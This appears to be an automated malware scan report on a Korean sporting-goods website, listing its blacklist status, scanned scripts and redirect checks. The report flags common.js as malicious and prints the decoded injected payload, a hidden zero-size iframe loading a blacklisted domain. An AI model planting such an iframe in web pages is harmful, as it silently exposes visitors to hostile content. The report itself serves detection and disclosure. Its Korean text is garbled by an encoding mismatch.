Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=bronce.co.kr
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.bronce.co.kr/ | 200 OK Content-Length: 73494 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.bandoleports.co.kr <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>³¬½Ã,Ä·ÇÎ,½ºÆ÷Ã÷ Àü¹®¸ô ¹Ýµµ·¹Æ÷Ã÷ ÀÔ´Ï´Ù</title> <meta http-equiv="Content-Type" content="text/html; charset=euc-kr" /> <meta http-equiv="Imagetoolbar" content="no" /> <meta name="keywords" content="³¬½Ã,Ä·ÇÎ,µî»ê,½ºÆ÷Ã÷ ±¸±â¿ëÇ°,½ºÆ÷Ã÷ ÀÇ·ù" /> <meta name="description" content="Ä ...[4366 bytes skipped]... | ||
http://www.bronce.co.kr/jscript/common.js | 200 OK Content-Length: 23682 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: www.jumprope.co.kr if (navigator.userAgent.toLowerCase().indexOf("msie") != -1) {
try { document.execCommand('BackgroundImageCache', false, true); } catch(e) {} } String.prototype.trim = function() { return this.replace(/(^[ \t\n\r]*)|([ \t\n\r]*$)/g,''); } String.prototype.stripspace = function() { return this.replace(/ /g, ''); } String.prototype.replaceAll = function(a, b) { var s = this; if ( ...[4057 bytes skipped]... Decoded script: <iframe src=http://www.jumprope.co.kr/mail/index.html width=0 height=0></iframe> | ||
http://www.bronce.co.kr/jscript/embed.js | 200 OK Content-Length: 3100 Content-Type: application/x-javascript | clean |
http://www.bronce.co.kr/jscript/ajax.js | 200 OK Content-Length: 2458 Content-Type: application/x-javascript | clean |
http://www.bronce.co.kr/jscript/json.js | 200 OK Content-Length: 5093 Content-Type: application/x-javascript | clean |
http://www.bronce.co.kr/jscript/rollover.js | 200 OK Content-Length: 1033 Content-Type: application/x-javascript | clean |
http://www.bronce.co.kr/jscript/user_func.js | 200 OK Content-Length: 2641 Content-Type: application/x-javascript | clean |
http://www.bronce.co.kr/main/popup_main.js.asp | 200 OK Content-Length: 891 Content-Type: text/html | clean |
http://www.bronce.co.kr/test404page.js | 404 Not Found Content-Length: 1466 Content-Type: text/html | clean |
http://www.bronce.co.kr/jscript/floating.js | 200 OK Content-Length: 3863 Content-Type: application/x-javascript | clean |
http://www.bronce.co.kr/jscript/cookie.js | 200 OK Content-Length: 1022 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: bronce.co.kr
Result:
GET / HTTP/1.1
Host: bronce.co.kr
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: bronce.co.kr
Referer: http://www.google.com/search?q=bronce.co.kr
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: bronce.co.kr
Referer: http://www.google.com/search?q=bronce.co.kr
Result:
The result is similar to the first query. There are no suspicious redirects found.